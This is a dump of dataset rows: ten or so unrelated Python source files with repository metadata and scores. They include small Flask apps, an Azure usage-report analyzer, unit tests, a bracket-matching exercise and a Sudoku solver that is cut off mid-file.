names += [n for _ in range(int(total_penalty / p))]
return {"score": penalty, "names": names}
def allocate(self, bed):
if self.bed is not None:
warn(f"Patient {self.name} is already in bed {self.bed.name}.")
self.bed = bed
def discharge(self):
self.bed = None
def patient_to_dict(patient: Patient) -> Dict[str, Any]:
"""
Returns dictionary representation of a Patient class instance.
"""
def _patient_dict(patient: Patient) -> Dict[str, Any]:
"""
Dictionary factory to convert Patient class instance
to patient details dictionary.
"""
return {
field: (value if not isinstance(value, Enum) else value.name)
for field, value in patient
}
return asdict(patient, dict_factory=_patient_dict) | en | 0.525697 | Patient dataclass # convert and validate enums # initialise restrictions Returns dictionary representation of a Patient class instance. Dictionary factory to convert Patient class instance to patient details dictionary. | 2.73252 | 3 |
p04_cookies/main.py | AndreiHondrari/flask_exploration | 0 | 6614018 | <gh_stars>0
#!python
from flask import Flask, render_template, request, make_response
from typing import Union, Optional
app = Flask(__name__)
@app.route("/")
def index() -> None:
number: Optional[Union[str, int]] = request.cookies.get('number')
number = int(number) if number is not None else 0
context = {
"number": number
}
resp = make_response(render_template("index.html", **context))
resp.set_cookie("number", str(number + 1))
return resp
if __name__ == "__main__":
app.run(debug=True)
| #!python
from flask import Flask, render_template, request, make_response
from typing import Union, Optional
app = Flask(__name__)
@app.route("/")
def index() -> None:
number: Optional[Union[str, int]] = request.cookies.get('number')
number = int(number) if number is not None else 0
context = {
"number": number
}
resp = make_response(render_template("index.html", **context))
resp.set_cookie("number", str(number + 1))
return resp
if __name__ == "__main__":
app.run(debug=True) | none | 1 | 2.801391 | 3 | |
analyzer.py | JavaJHMalerBus/azure_analyzer | 0 | 6614019 | <filename>analyzer.py
#!/usr/bin/env python
import json
import tkinter as tk
from tkinter import filedialog
import texttable
import argparse
rt = tk.Tk()
rt.withdraw()
parser = argparse.ArgumentParser(description='Analyzes and summarizes an AzureUsage.json file')
parser.add_argument('--path', action='store', default='',
help='The path to the AzureUsage.json file. If not provided, a file chooser dialog will '
'pop up.')
parser.add_argument('--detail', action='store', default=-1, type=int, help='Shows detailed information about the '
'given id. The '
'id equals to the #-column shown when this '
'parameter '
' is left out.')
parser.add_argument('--subscriptions', action='store_true', help='Lists all subscriptions that were found within the '
'file.')
parser.add_argument('--group', action='store_true', help='Groups the overview by subscriptions.')
args = parser.parse_args()
json_path = args.path if args.path != '' else filedialog.askopenfilename()
def initialize_mappings(d):
do = {}
mapping = []
for item in d:
if item["Cost"] == 0:
continue
if item["ServiceName"] in do:
do[item["ServiceName"]]["Quantity"] += item["Quantity"]
do[item["ServiceName"]]["Cost"] += item["Cost"]
else:
do[item["ServiceName"]] = item
for i, (name, value) in enumerate(do.items()):
mapping.append(name)
return do, mapping
def initialize_subscriptions(do):
subs_dict = {}
subs_usages = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in subs_dict:
subs_dict[value["SubscriptionGuid"]] = {
"SubscriptionName": value["SubscriptionName"],
"SubscriptionGUID": value["SubscriptionGuid"],
}
if value["SubscriptionGuid"] not in subs_usages:
subs_usages[value["SubscriptionGuid"]] = 1
else:
subs_usages[value["SubscriptionGuid"]] += 1
return subs_dict, subs_usages
def group_by_subscription(do):
res = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in res:
res[value["SubscriptionGuid"]] = [value]
else:
res[value["SubscriptionGuid"]].append(value)
return res
def parse(d, group_by_sub=False):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Price per unit", "Quantity", "Price"])
if not group_by_sub:
for i, (name, value) in enumerate(do.items()):
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
else:
grouped = group_by_subscription(do)
i = 0
for x, (guid, items) in enumerate(grouped.items()):
for value in items:
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (
value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
i += 1
print(table.draw())
def print_subscriptions(d):
do, mapping = initialize_mappings(d)
subs, usages = initialize_subscriptions(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Identifier", "Usages"])
for i, (guid, value) in enumerate(subs.items()):
table.add_row([i, value["SubscriptionName"], guid, usages[guid]])
print(table.draw())
def detail(id, d):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Type", "Region", "Subscription", "Price per unit", "Quantity", "Price"])
if len(mapping) > id >= 0:
table.add_row(
[id, do[mapping[id]]["ServiceName"], do[mapping[id]]["ServiceType"], do[mapping[id]]["ServiceRegion"],
do[mapping[id]]["SubscriptionName"],
do[mapping[id]]["Cost"] / do[mapping[id]]["Quantity"] if (
do[mapping[id]]["Quantity"] > 0 and do[mapping[id]]["Cost"] > 0) else "N/A",
do[mapping[id]]["Quantity"], do[mapping[id]]["Cost"]])
else:
print("Id not found! Was the file changed since you retrieved the id?")
return
print(table.draw())
with open(json_path) as json_file:
data = json.load(json_file)
print("Parsing data from subscription \"" + data[0]["SubscriptionName"] + "\"...")
if args.detail == -1:
if args.subscriptions:
print_subscriptions(data)
else:
parse(data, args.group)
else:
detail(args.detail, data)
| <filename>analyzer.py
#!/usr/bin/env python
import json
import tkinter as tk
from tkinter import filedialog
import texttable
import argparse
rt = tk.Tk()
rt.withdraw()
parser = argparse.ArgumentParser(description='Analyzes and summarizes an AzureUsage.json file')
parser.add_argument('--path', action='store', default='',
help='The path to the AzureUsage.json file. If not provided, a file chooser dialog will '
'pop up.')
parser.add_argument('--detail', action='store', default=-1, type=int, help='Shows detailed information about the '
'given id. The '
'id equals to the #-column shown when this '
'parameter '
' is left out.')
parser.add_argument('--subscriptions', action='store_true', help='Lists all subscriptions that were found within the '
'file.')
parser.add_argument('--group', action='store_true', help='Groups the overview by subscriptions.')
args = parser.parse_args()
json_path = args.path if args.path != '' else filedialog.askopenfilename()
def initialize_mappings(d):
do = {}
mapping = []
for item in d:
if item["Cost"] == 0:
continue
if item["ServiceName"] in do:
do[item["ServiceName"]]["Quantity"] += item["Quantity"]
do[item["ServiceName"]]["Cost"] += item["Cost"]
else:
do[item["ServiceName"]] = item
for i, (name, value) in enumerate(do.items()):
mapping.append(name)
return do, mapping
def initialize_subscriptions(do):
subs_dict = {}
subs_usages = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in subs_dict:
subs_dict[value["SubscriptionGuid"]] = {
"SubscriptionName": value["SubscriptionName"],
"SubscriptionGUID": value["SubscriptionGuid"],
}
if value["SubscriptionGuid"] not in subs_usages:
subs_usages[value["SubscriptionGuid"]] = 1
else:
subs_usages[value["SubscriptionGuid"]] += 1
return subs_dict, subs_usages
def group_by_subscription(do):
res = {}
for i, (name, value) in enumerate(do.items()):
if value["SubscriptionGuid"] not in res:
res[value["SubscriptionGuid"]] = [value]
else:
res[value["SubscriptionGuid"]].append(value)
return res
def parse(d, group_by_sub=False):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Price per unit", "Quantity", "Price"])
if not group_by_sub:
for i, (name, value) in enumerate(do.items()):
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
else:
grouped = group_by_subscription(do)
i = 0
for x, (guid, items) in enumerate(grouped.items()):
for value in items:
table.add_row([i, value["ServiceName"],
value["Cost"] / value["Quantity"] if (
value["Quantity"] > 0 and value["Cost"] > 0) else "N/A",
value["Quantity"], value["Cost"]])
i += 1
print(table.draw())
def print_subscriptions(d):
do, mapping = initialize_mappings(d)
subs, usages = initialize_subscriptions(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Identifier", "Usages"])
for i, (guid, value) in enumerate(subs.items()):
table.add_row([i, value["SubscriptionName"], guid, usages[guid]])
print(table.draw())
def detail(id, d):
do, mapping = initialize_mappings(d)
table = texttable.Texttable()
table.add_row(["#", "Name", "Type", "Region", "Subscription", "Price per unit", "Quantity", "Price"])
if len(mapping) > id >= 0:
table.add_row(
[id, do[mapping[id]]["ServiceName"], do[mapping[id]]["ServiceType"], do[mapping[id]]["ServiceRegion"],
do[mapping[id]]["SubscriptionName"],
do[mapping[id]]["Cost"] / do[mapping[id]]["Quantity"] if (
do[mapping[id]]["Quantity"] > 0 and do[mapping[id]]["Cost"] > 0) else "N/A",
do[mapping[id]]["Quantity"], do[mapping[id]]["Cost"]])
else:
print("Id not found! Was the file changed since you retrieved the id?")
return
print(table.draw())
with open(json_path) as json_file:
data = json.load(json_file)
print("Parsing data from subscription \"" + data[0]["SubscriptionName"] + "\"...")
if args.detail == -1:
if args.subscriptions:
print_subscriptions(data)
else:
parse(data, args.group)
else:
detail(args.detail, data)
| en | 0.070296 | #!/usr/bin/env python #-column shown when this ' | 3.509628 | 4 |
BOJ_Solved/BOJ-9012.py | CodingLeeSeungHoon/Python_Algorithm_TeamNote | 7 | 6614020 | <filename>BOJ_Solved/BOJ-9012.py
"""
백준 9012번 : 괄호
"""
test = int(input( ))
result = []
def is_vps(ps):
stack = []
for p in ps:
if len(stack) == 0 and p == ')':
return False
elif p == ')':
del stack[len(stack) - 1]
elif p == '(':
stack.append(1)
if len(stack) == 0:
return True
else:
return False
def print_yes_or_no(result):
for r in result:
if r == True:
print('YES')
else:
print('NO')
for _ in range(test):
ps = input( )
result.append(is_vps(ps))
print_yes_or_no(result)
| <filename>BOJ_Solved/BOJ-9012.py
"""
백준 9012번 : 괄호
"""
test = int(input( ))
result = []
def is_vps(ps):
stack = []
for p in ps:
if len(stack) == 0 and p == ')':
return False
elif p == ')':
del stack[len(stack) - 1]
elif p == '(':
stack.append(1)
if len(stack) == 0:
return True
else:
return False
def print_yes_or_no(result):
for r in result:
if r == True:
print('YES')
else:
print('NO')
for _ in range(test):
ps = input( )
result.append(is_vps(ps))
print_yes_or_no(result)
| ko | 0.997577 | 백준 9012번 : 괄호 | 3.593254 | 4 |
wef/items/tasks/send_buy_message.py | deadlylaid/study_alone | 6 | 6614021 | <reponame>deadlylaid/study_alone
from celery import Task
from items.utils import SendSMS
class SendBuyMessageTask(Task):
def run(self, buyer_nickname, buyer_phone, saler_phone, selected_bookname):
sms = SendSMS()
sms.send_sms(buyer_nickname, buyer_phone, saler_phone, selected_bookname)
print("Task success")
| from celery import Task
from items.utils import SendSMS
class SendBuyMessageTask(Task):
def run(self, buyer_nickname, buyer_phone, saler_phone, selected_bookname):
sms = SendSMS()
sms.send_sms(buyer_nickname, buyer_phone, saler_phone, selected_bookname)
print("Task success") | none | 1 | 2.11096 | 2 | |
whereis-master/whereis-backend/main.py | jaakaappi/archived-projects | 0 | 6614022 | <reponame>jaakaappi/archived-projects<gh_stars>0
from database import database
from flask import Flask, render_template, jsonify, request, abort
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
@app.route('/locations', methods=['GET'])
def locations():
return jsonify(database.get_locations())
@app.route('/items/<int:count>')
def items(count):
return jsonify(database.get_items(count))
@app.route('/items', methods=['GET'])
def find_items():
name = request.args.get('name')
location = request.args.get('location')
if name or location:
items = database.get_items(None, name, location)
return jsonify(items)
else:
return abort(400)
@app.route('/items', methods=['PUT', 'POST'])
def add_item():
print(request.json)
name = request.args.get('name')
location = request.args.get('location')
print('adding', name, location)
return ""
if __name__ == '__main__':
if database.is_empty():
database.fill_test_db()
app.run(host='0.0.0.0')
| from database import database
from flask import Flask, render_template, jsonify, request, abort
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
@app.route('/locations', methods=['GET'])
def locations():
return jsonify(database.get_locations())
@app.route('/items/<int:count>')
def items(count):
return jsonify(database.get_items(count))
@app.route('/items', methods=['GET'])
def find_items():
name = request.args.get('name')
location = request.args.get('location')
if name or location:
items = database.get_items(None, name, location)
return jsonify(items)
else:
return abort(400)
@app.route('/items', methods=['PUT', 'POST'])
def add_item():
print(request.json)
name = request.args.get('name')
location = request.args.get('location')
print('adding', name, location)
return ""
if __name__ == '__main__':
if database.is_empty():
database.fill_test_db()
app.run(host='0.0.0.0') | none | 1 | 2.623255 | 3 | |
testing/testpZ_construct.py | elvijs/BranchedGP | 1 | 6614023 | <filename>testing/testpZ_construct.py
# Generic libraries
import numpy as np
import tensorflow as tf
import unittest
# Branching files
from BranchedGP import pZ_construction_singleBP
from gpflow import settings
class TestpZ(unittest.TestCase):
def test_pZ(self):
np.set_printoptions(suppress=True, precision=2)
X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.sort(X, 0)
BP_tf = tf.placeholder(settings.float_type, shape=[])
eZ0_tf = tf.placeholder(settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [1, 0]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
for BP in [0, 0.2, 0.5, 1]:
print('========== BP %.2f ===========' % BP)
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
self.assertTrue(np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
else:
self.assertTrue(np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
def test_further(self):
np.set_printoptions(suppress=True, precision=6)
# X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.array([0.1, 0.2, 0.3, 0.4])[:, None]
BP_tf = tf.placeholder(dtype=settings.float_type, shape=[])
eZ0_tf = tf.placeholder(dtype=settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [0.85, 0.15]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
BP = 0.2
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(r, c)
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
assert np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :]))
else:
assert np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(np.array([1., 0., 0.])))
# from matplotlib import pyplot as plt
# plt.ion()
# plt.matshow(pZ)
eZ0z = pZ_construction_singleBP.expand_pZ0Zeros(pZ0)
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, BP, X)
assert np.allclose(r, pZ, atol=1e-5)
# try another
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: 0.3, eZ0_tf: eZ0})
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, 0.3, X)
assert np.allclose(r, pZ, atol=1e-5)
if __name__ == '__main__':
unittest.main()
| <filename>testing/testpZ_construct.py
# Generic libraries
import numpy as np
import tensorflow as tf
import unittest
# Branching files
from BranchedGP import pZ_construction_singleBP
from gpflow import settings
class TestpZ(unittest.TestCase):
def test_pZ(self):
np.set_printoptions(suppress=True, precision=2)
X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.sort(X, 0)
BP_tf = tf.placeholder(settings.float_type, shape=[])
eZ0_tf = tf.placeholder(settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [1, 0]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
for BP in [0, 0.2, 0.5, 1]:
print('========== BP %.2f ===========' % BP)
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
self.assertTrue(np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
else:
self.assertTrue(np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
def test_further(self):
np.set_printoptions(suppress=True, precision=6)
# X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.array([0.1, 0.2, 0.3, 0.4])[:, None]
BP_tf = tf.placeholder(dtype=settings.float_type, shape=[])
eZ0_tf = tf.placeholder(dtype=settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [0.85, 0.15]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
BP = 0.2
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(r, c)
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
assert np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :]))
else:
assert np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(np.array([1., 0., 0.])))
# from matplotlib import pyplot as plt
# plt.ion()
# plt.matshow(pZ)
eZ0z = pZ_construction_singleBP.expand_pZ0Zeros(pZ0)
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, BP, X)
assert np.allclose(r, pZ, atol=1e-5)
# try another
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: 0.3, eZ0_tf: eZ0})
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, 0.3, X)
assert np.allclose(r, pZ, atol=1e-5)
if __name__ == '__main__':
unittest.main()
| en | 0.645268 | # Generic libraries # Branching files # after branch point should be prior # X = np.linspace(0, 1, 4, dtype=float)[:, None] # after branch point should be prior # from matplotlib import pyplot as plt # plt.ion() # plt.matshow(pZ) # try another | 2.230365 | 2 |
sklearnex/svm/_common.py | cmsxbc/scikit-learn-intelex | 0 | 6614024 | #===============================================================================
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
def get_dual_coef(self):
return self.dual_coef_
def set_dual_coef(self, value):
self.dual_coef_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.dual_coef_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
def get_intercept(self):
return self._intercept_
def set_intercept(self, value):
self._intercept_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.intercept_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
| #===============================================================================
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
def get_dual_coef(self):
return self.dual_coef_
def set_dual_coef(self, value):
self.dual_coef_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.dual_coef_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
def get_intercept(self):
return self._intercept_
def set_intercept(self, value):
self._intercept_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.intercept_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
| en | 0.752833 | #=============================================================================== # Copyright 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #=============================================================================== | 1.817551 | 2 |
ipytracer/_version.py | sn0wle0pard/tracer.py | 125 | 6614025 | <reponame>sn0wle0pard/tracer.py
# -*- coding: UTF-8 -*-
# Copyright (c) <NAME>.
# Distributed under the terms of the Modified BSD License.
version_info = (0, 3, 0, 'dev')
__version__ = '.'.join(map(str, version_info))
| # -*- coding: UTF-8 -*-
# Copyright (c) <NAME>.
# Distributed under the terms of the Modified BSD License.
version_info = (0, 3, 0, 'dev')
__version__ = '.'.join(map(str, version_info)) | en | 0.709506 | # -*- coding: UTF-8 -*- # Copyright (c) <NAME>. # Distributed under the terms of the Modified BSD License. | 1.637674 | 2 |
tests/test_package_prefix.py | mhbl3/matlabdomain | 38 | 6614026 | # -*- coding: utf-8 -*-
"""
test_package_function
~~~~~~~~~~~~~~~~~~~~~
Test the autodoc extension with the matlab_keep_package_prefix option.
:copyright: Copyright 2019 by the <NAME>.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import pytest
from sphinx import addnodes
from sphinx.testing.fixtures import make_app, test_params # noqa: F811;
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
app = make_app(srcdir=srcdir)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == '+package.func(x)\n\nReturns x'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
confdict = { 'matlab_keep_package_prefix' : False }
app = make_app(srcdir=srcdir, confoverrides=confdict)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == 'package.func(x)\n\nReturns x'
if __name__ == '__main__':
pytest.main([__file__])
| # -*- coding: utf-8 -*-
"""
test_package_function
~~~~~~~~~~~~~~~~~~~~~
Test the autodoc extension with the matlab_keep_package_prefix option.
:copyright: Copyright 2019 by the <NAME>.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import pytest
from sphinx import addnodes
from sphinx.testing.fixtures import make_app, test_params # noqa: F811;
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
app = make_app(srcdir=srcdir)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == '+package.func(x)\n\nReturns x'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
confdict = { 'matlab_keep_package_prefix' : False }
app = make_app(srcdir=srcdir, confoverrides=confdict)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == 'package.func(x)\n\nReturns x'
if __name__ == '__main__':
pytest.main([__file__])
| en | 0.669895 | # -*- coding: utf-8 -*- test_package_function ~~~~~~~~~~~~~~~~~~~~~ Test the autodoc extension with the matlab_keep_package_prefix option. :copyright: Copyright 2019 by the <NAME>. :license: BSD, see LICENSE for details. # noqa: F811; | 1.899856 | 2 |
python/sudoku.py | kedder/sudoku | 0 | 6614027 | import sys
from copy import deepcopy
from typing import List, Set, Tuple, Iterator
# See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems
class UnsolvableSudoku(Exception):
pass
class Problem:
_data: List[List[int]]
_options: List[List[Set[int]]]
def __init__(self) -> None:
self._data = [[0] * 9 for y in range(9)]
self._options = [[set(range(1, 10)) for x in range(9)]
for y in range(9)]
@classmethod
def parse(cls, raw: str) -> "Problem":
p = Problem()
lines = raw.strip().split("\n")
for y, line in enumerate(lines):
for x, sn in enumerate(line.strip().split()):
n = int(sn)
if not n:
continue
p.set(x, y, n)
return p
def get(self, x: int, y: int) -> int:
return self._data[y][x]
def get_options(self, x: int, y: int) -> Set[int]:
return self._options[y][x]
def set(self, x:int, y:int, value:int) -> None:
# Verify the value
row_coords = [(x, y) for x in range(9)]
if value in set(self.get(x, y) for x, y in row_coords):
raise ValueError(f"Value {value} is already in the row {y}")
col_coords = [(x, y) for y in range(9)]
if value in set(self.get(x, y) for x, y in col_coords):
raise ValueError(f"Value {value} is already in the col {x}")
bx = x // 3 * 3
by = y // 3 * 3
sec_coords = [(x, y)
for x in range(bx, bx+3)
for y in range(by, by+3)]
if value in set(self.get(x, y) for x, y in sec_coords):
raise ValueError(f"Value {value} is already in the sector {bx, by}")
# Set the value
self._data[y][x] = value
# Finally, remove from options
self._options[y][x] = set()
for coords in [row_coords, col_coords, sec_coords]:
for x, y in coords:
if value not in self._options[y][x]:
continue
self._options[y][x].remove(value)
def is_solved(self) -> bool:
# Problem is solved when all the cells are filled
return all(self.get(x, y) for x in range(9) for y in range(9))
def is_solvable(self) -> bool:
# Problem is solvable if all empty cells have at least one option
return all(self._options[y][x] for x in range(9) for y in range(9)
if not self.get(x, y))
def copy(self) -> "Problem":
c = Problem()
c._data = deepcopy(self._data)
c._options = deepcopy(self._options)
return c
def format(self) -> str:
out = []
for blockn in range(3):
for line in self._data[blockn*3 : blockn*3+3]:
outline = ""
outline += (" ".join(str(n or " ") for n in line[0:3]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[3:6]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[6:9]))
out.append(outline)
if blockn != 2:
out.append("------+-------+------")
return "\n".join(out)
def print(self) -> None:
print(self.format())
class Solver:
def __init__(self, problem: Problem):
self.problem = problem
def solve(self) -> Problem:
while not self.problem.is_solved():
moves = self._get_trivial_moves()
if not moves:
# No trivial moves are left. We have to solve by trials and
# errors.
return self._fork()
for x, y, value in moves:
self.problem.set(x, y, value)
if not self.problem.is_solvable():
raise UnsolvableSudoku()
return self.problem
def _fork(self) -> Problem:
# Find first cell with options
x, y = next(self._get_empty_coords())
opts = self.problem.get_options(x, y)
# Try all options one by one
for candidate in opts:
attempt = self.problem.copy()
attempt.set(x, y, candidate)
subsolver = Solver(attempt)
try:
return subsolver.solve()
except UnsolvableSudoku:
# Didn't work, try another option
continue
# All options exhausted, we can't solve this
raise UnsolvableSudoku()
def _get_trivial_moves(self) -> List[Tuple[int, int, int]]:
moves = []
for x, y in self._get_empty_coords():
opts = self.problem.get_options(x, y)
if len(opts) == 1:
moves.append((x, y, list(opts)[0]))
return moves
def _get_empty_coords(self) -> Iterator[Tuple[int, int]]:
for x in range(9):
for y in range(9):
val = self.problem.get(x, y)
if val:
continue
yield (x, y)
def load_problem(fname: str) -> Problem:
with open(fname, 'r') as f:
probstr = f.read()
return Problem.parse(probstr)
def main() -> None:
problem = load_problem(sys.argv[1])
print("Initial problem:")
problem.print()
solver = Solver(problem)
solved = solver.solve()
print("Solved problem:")
solved.print()
if __name__ == '__main__':
main()
| import sys
from copy import deepcopy
from typing import List, Set, Tuple, Iterator
# See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems
class UnsolvableSudoku(Exception):
pass
class Problem:
_data: List[List[int]]
_options: List[List[Set[int]]]
def __init__(self) -> None:
self._data = [[0] * 9 for y in range(9)]
self._options = [[set(range(1, 10)) for x in range(9)]
for y in range(9)]
@classmethod
def parse(cls, raw: str) -> "Problem":
p = Problem()
lines = raw.strip().split("\n")
for y, line in enumerate(lines):
for x, sn in enumerate(line.strip().split()):
n = int(sn)
if not n:
continue
p.set(x, y, n)
return p
def get(self, x: int, y: int) -> int:
return self._data[y][x]
def get_options(self, x: int, y: int) -> Set[int]:
return self._options[y][x]
def set(self, x:int, y:int, value:int) -> None:
# Verify the value
row_coords = [(x, y) for x in range(9)]
if value in set(self.get(x, y) for x, y in row_coords):
raise ValueError(f"Value {value} is already in the row {y}")
